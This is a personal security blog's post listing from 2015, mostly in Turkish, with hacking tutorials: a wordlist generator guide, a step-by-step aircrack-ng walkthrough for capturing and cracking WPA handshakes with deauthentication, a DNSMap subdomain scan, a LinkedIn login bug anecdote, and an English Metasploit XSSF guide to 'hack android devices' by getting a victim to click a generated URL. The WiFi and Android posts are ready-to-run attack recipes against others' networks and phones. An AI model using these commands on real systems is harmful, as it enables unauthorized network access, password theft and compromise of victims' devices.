Linux Sistemlerde Mac Adresinin Değiştirilmesi
30 Friday Oct 2015
Posted Türkçe İçerik, Tips
in30 Friday Oct 2015
Posted Türkçe İçerik, Tips
in30 Friday Oct 2015
Posted Cyber Security, Türkçe İçerik
inSelamlar arkadaşlar
Bu videoda ağ üzerinden gelen verileri nasıl listelenebileği ile ilgili ufak bir demo videosu hazırladım.
Hedef olarak kendi cep telefonumdan öncelikli olarak örnek bir demo sayfası olması için modemimin arayüzüne erişmek için kullandığım id ve şifreyi chrome kullanarak giriş yapmayı denedim. Ayrıca sadece web browserlardan listeleme olmadığını, göstermek için yine Instagramın bu sefer applicationunu kullanarak resimlerin de nasıl dinlenip listelenebildiğini görebilirsiniz.
30 Friday Oct 2015
Posted Türkçe İçerik, Tips
in07 Monday Sep 2015
Posted Cyber Security, Türkçe İçerik
inTags
crunch, crunch wordlist, crunch wordlist generator, crunch wordlist oluşturma, wordlist generator, wordlist oluşturucu
Selamlar arkadaşlar
Kali Linux’ta hazır olarak bulunan crunch programı ile istenilen standartlarda nasıl wordlist oluşturabileceğinizi hızlıca anlattım.
temel mantık olarak komut:
crunch enAzKaçKarakterOlucak enFazlaKaçKarakterOlucak hangiSayılarVeyaHangiRakamlarKullanılacak -t basındaOlmasınıIstediginizBirSeyVarsaSonrasında@İşaretiKoy -o kaydetBeni.txt
şeklinde yorumlanabilir.
Videoyu izleyerek daha net anlayabilirsiniz.
E-Mail: mertkaplan.tr@gmail.com
23 Sunday Aug 2015
Posted Cyber Security, Türkçe İçerik
inTags
aircrack-ng, aircrack-ng kullanımı, airmon-ng, airmon-ng kullanımı, how to active kali linux wifi, how to use aircrack-ng, kali linux wifi etkinleştirme, Wifi hack, wpa hack, wpa2 hack
Selamlar arkadaşlar, her ne kadar şimdiye kadar İngilizce blog tutmaya çalışsam da, blog hitimin %80’inini yurt dışından alsam da artık çok önemli konular olmadığı sürece blog yazılarımı Türkçe olarak paylaşacağım. Bu blogumu artık hem kendime not defteri, bildiklerimi ve deneyimlerimi ülkemdeki Türkçe kaynak sıkıntısı çeken tüm arkadaşlar için bir yardım eli olarak tutmak istiyorum. Umarım kendini geliştirmek isteyen dostlarım için legal kullanımlarda yardımcı olabilirim.
Bu haberden sonra dünyada ve ülkemizde wifi hacklemenin moda olduğu ve bununla alakalı gelen tüm sorulara yanıt olması için açıklayıcı bir Aircrack-ng videosu çekip sizlerle paylaşmak istedim. Videonun süresi biraz uzunca olsa da, adımları izleyerek pentest işlemlerinizi gerçekleştirebilirsiniz.
Videodaki anlatım:
iwconfig
Öncelikli olarak wireless kartımıza bakmamız gerekmekte.
Bunun için iwconfig komutunu kullanarak görüntüleyebiliriz.
Default olarak laptop üzerindeki wireless kartları wlan0, usb portlarına taktığınız kartlar ise farklı isimler alıyor
ve buradan bilgileri okuyarak, kullanmak istediğimiz kart’a göre sıradaki işlemleri uygulayabiliriz.
airmon-ng start wlan0
bu komut ile airmon-ng yazılımımızı wlan0 üzerinden çalıştırmaya başlamış olduk fakat
tam olarak çalışması için networkü kullanan processleri durdurmamız gerekiyor.
eğer çalışan process varsa
kill 6544
gibi komutlar ile hangi process çalışıyorsa durdurabilirsiniz…
tekrar airmon-ng start wlan0 dediğimizde artık bu processlerin çalışmadığını göreceğiz.
Bu işlemi tamamladıktan sonra wifi kartımızı görüntüleme moduna almış olduk.
Interface olarak: wlan0mon görüntüleniyor. Devam edelim
(Aircrack-RC 2 paketi ile mon0 olarak görünen interface artık wlan0mon olarak değiştirildi)
airodump-ng wlan0mon
bu komut ile etrafımızdaki tüm wirelessleri görüntüleyip paketleri dinlemeye, kanal ve BSSID’lerini
gözlemlemeye yarayacaktır.
hedef olarak seçtiğiniz bir wifi varsa artık bilgilerini bir önceki adımdan alıp airodump yazılımı ile
özel olarak dinleyip kaydetmeye başlayacağız…
ctrl c ile durduruyoruz….
airodump-ng –bssid ELILEYAZINIZ -w /root/Desktop/mertkaplanblog wlan0mon -c ELILEYAZINIZ –ignore-negative-one
bu komut ile artık hedef wifi noktasını dinleyip masaüstüne kayıtı gerçekleştireceğiz.
özel olarak dinlememiz başladı, artık handshake yapıp aldığımız sinyaller ile kendi cihazımız arasında bağlantı
kurmamız için gerekli olan adıma geçmemiz gerekmekte.
aireplay yazılımı ile handshake oluşturmaya çalışacağız….
aireplay-ng –deauth 1 -a ELILEYAZINIZ wlan0mon –ignore-negative-one -c ELILEYAZINIZ
aireplay’e spesifik detayları ile beraber sinyal noktamızı iletiyoruz ve handshake için denemesini isteyeceğiz.
bu sırada 4.adımda uyguladıgımız özel olarak dinlediğimiz airodump terminalinin açık kalması gerekmekte.
handshake olup olmadığını buradan gözlemleyeceğiz….
kendisi handshake yapmış 🙂 fakat sizde handshake yapamayan bir wifi ile karşırsanız buradaki kanal noktalarından
komutları deneyerek handshake yapmaya çalışmanız gerekmekte.
aireplay-ng –deauth 1 -a ELILEYAZINIZ wlan0mon –ignore-negative-one -c ELILEYAZINIZ
eğer sonuç olumlu olursa da yeni terminal açıp bu yukarıdaki gördüğünüz komut ile handshake yapabilir ve şeklinde
görüntü alabilirsiniz
ctrl c ile data toplamayı durdurdum.
artık aircrack ile bu dosyaları nasıl kırabiliriz topladığımız datayı nasıl wordlist ile kullanacağız onu gösteceğim.
aircrack-ng -w /wordListinOlduguDizin/wordlist.txt topladigimData.cap
Desktop klasörümüzde .cap uzantılı dosyamızı artık son adım olarak aircrack ile kırma işlemine sokuyoruz.
Eğer topladıgınız sinyaller ile wordlistiniz uyuşuyorsa biraz sabır ile wifi şifrenizi elde edebilirsiniz.
Tüm bu işlemlerden sonra monitor moduna aldığınız wifi kartınız, normal olarak wifi’ye bağlanmayacaktır. Kali Linux’ta aircrack sonrası tekrar wifi’ye bağlanmak için monitor’ing modu kapatıp network manager’i yeniden başlatmak zorundasınız.
Bunu da aşağıdaki videoda açıkladım:
airmon-ng stop wlan0mon
service network-manager start
E-Mail: mertkaplan.tr@gmail.com
17 Monday Aug 2015
Posted Cyber Security
inSelamlar, bu makalede DNSMap’ı anlatacağım.
DNSMap bir alandaki alt alanları tespit etmek için kullanılan bir araçtır. Kali Linux’un repositorysinde hazır olarak bulunan bu araç ile alan hakkında genel bilgiler elde etmek mümkün. Bu anlatımımda videodaki gibi spesifik bir subdomain aramak için wordlist kullanarak DNSMap’ı nasıl kullanabileceğinizi gösterdim.
Örnek tarama videosu:
Normal tarama: dnsmap google.com
Tarama kaydetme: dnsmap google.com -r /root/Desktop/kaydetBeni.txt
Wordlist ile tarama yapma: dnsmap google.com -w /root/Desktop/taranacak.txt -r /root/Desktop/kaydetBeni.txt
E-Mail: mertkaplan.tr@gmail.com
11 Tuesday Aug 2015
Posted Türkçe İçerik
inSelamlar arkadaşlar !
Bu sefer bir kod veya hacking üzerine değil, yaşadığım bir deneyimi sizlere aktaracağım.
Olayın başlangıcı 1 hafta önceye dayanıyor. LinkedIn üzerinden efendi efendi login olduktan sonra, kullandığım browser’ı kapatıp aradan 4-5 saat geçmesine rağmen tekrar aynı browser’ı ile LinkedIn’e girmek istememle başladı. Hepimizin kullandığı gibi farklı sistemler üzerinde bende farklı şifreler kullanıyorum ve kullandığım farklı bir şifremi LinkedIn şifrem olmadığı halde girdiğimde bir hata alıp sisteme login olduğumu farkettim. Bu durumun o kadar saçma, eksik bir kodlama ile geldiğini düşünerek LinkedIn’e çektiğim video ile durumu anlatan bir mail gönderdim. ( Nasılsa bunlardan bir şey olmaz, bug bounty falanda istemiyorum düşüncesinde olduğum için videoyu da biraz dalga geçer gibi çektim, iyiki de öyle yapmışım 🙂 !) Mailin başlığına da hemen baksınlar diye Login Page Bug gibi ilgi çekici bir şey yazmama rağmen aradan 12 saat geçmesine rağmen cevap gelmeyince ben de çektiğim videoyu yine LinkedIn üzerinde yayınladım :). Aradan 5 dakika geçti ve gönderimin kaldırıldığını görünce “kıh kıh” gülerek mail kutuma koştum. Attıkları mailde, “bu bir security açığı değil bundan bir şey olmaz takılın siz kafanıza göre…” ‘den başka bir anlam çıkmıyor. Ben de herkesin ulaşabileceği bir ortam olarak Youtube Hesabım ve Blogum üzerinden sizlere bu saçmalığı paylaşmak istedim.
Gelelim Buradan Çıkaracağımız Sonuçlara:
Mailde aldığım hatayı açıklarken neden böyle bir saçmalık yaptınız diye eklemiştim. Sorduğum bu soruma cevap yine gelmemiş ve sorgulamaya başladığımızda eğer böyle bir güvenlik açığı yoksa neden basit bir oturum açık kalsın mantığındaki kodlamayı yapamıyorsunuz ( ? ) yoksa oturum açık olduğu halde farklı şifreler kullanan insanların potansiyel diğer şifrelerini subdomainleriniz üzerinden bir de e-mail isteyerek mi alıyorsunuz 🙂 ?
Olay bunları düşündükten sonra şuraya dönüyor: Kaputu açmışlar, bir de aküyü çalmışlar. Kaputu açıyorsun aküyü neden çalıyorsun? Hadi aküyü çaldın niye kaputu kapamıyorsun ?
Not: Denemelerim Microsoft Edge ve Mozilla üzerinde oldu. Chrome’da bu hata ile karşılaşmadım. Bu da ortada bir muhtemel bir düzgün kodlama eksikliğini gösterse de hepinizi araştırmaya davet ediyorum ve buradan tüm potansiyel olabilecek güvenlik açıklarını egolarından daha ufak gördükleri için ti’ye alan tüm diğer şirket ve çalışanlarına da sevgilerimi gönderiyorum 🙂
Umarım yukarıdaki görseli de dikkate alarak mesajı almışsınızdır.
E-Mail: mertkaplan.tr@gmail.com
22 Friday May 2015
Posted Cyber Security
inHello dear friends, i was so busy last 1-2 months because of my private life and university finals.
Whatever, i’m back with a cool topic which is: How to hack android devices?
In this topic i will explain XSSF technique. There are many way to hack android device.
I hope, i will explain another methods in future.
Watch my real hacking time video:
Ok now, I’m going to explain steps with using kali linux:
1) Open terminal
( CTRL + ALT + T )
2) Go your metasploit dictionary with this command:
cd /opt/metasploit/apps/pro/msf3
3) Get exploit with this command:
svn export http://xssf.googlecode.com/svn/trunk ./ –force
4)Run metasploit command:
msfconsole
5) Load xssf tool command:
load xssf
6)This command show the url which is victim should be click:
xssf_url
7) After url click attack, ( if victim click the url ) show the active victims:
xssf_active_victims
8) Now you can use any module for the hack the device, I will use alert auxiliary module:
use auxiliary/xssf/public/misc/alert
9) If you want change the alert with this command:
set AlertMessage yourAlertIsHere
10) Just run the exploit:
run
If you want to see more details you can check this adress:
http://localhost:8889/gui.html?guipage=main
E-Mail: mertkaplan.tr@gmail.com
13 Friday Mar 2015
Posted Events
in06 Friday Mar 2015
Posted Events
in